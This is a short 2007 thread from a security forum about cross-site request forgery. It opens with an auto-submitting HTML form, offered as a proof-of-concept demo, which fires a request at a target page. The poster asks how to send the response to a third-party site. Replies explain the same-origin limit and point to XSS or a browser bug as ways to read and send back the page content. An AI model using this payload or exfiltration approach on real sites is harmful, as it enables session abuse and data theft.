Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
sending the entire HTML results to a third party site
Posted by: jamuse
Date: October 02, 2007 09:13AM

I'm setting up a PoC CSRF demo and want to send the entire HTML results to a third party site. I'm using the following code to send the request:
<HTML>
<BODY>
<form method="GET" id="evil" name="evil"
action="http://[site]/showinfo.aspx">
</form>
<script>
document.evil.submit();
</script>
</BODY>
</HTML>

after the form gets submitted how can I gobble the entire HTML results into a variable and send that off?

Options: ReplyQuote
Re: sending the entire HTML results to a third party site
Date: October 02, 2007 06:25PM

THe results? Because of the same origin policy, you cannot grab the resulting HTML. However, if your just trying to see if it worked, then you can do that in some other ways. An example would be finding XSS: if you find XSS in the target page, this means you can grab the HTML and send it back to you, as it would appear the javascript really did come from the page your trying to break into.

Options: ReplyQuote
Re: sending the entire HTML results to a third party site
Posted by: Gareth Heyes
Date: October 02, 2007 06:41PM

Safari 3.03 beta has the features you require ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.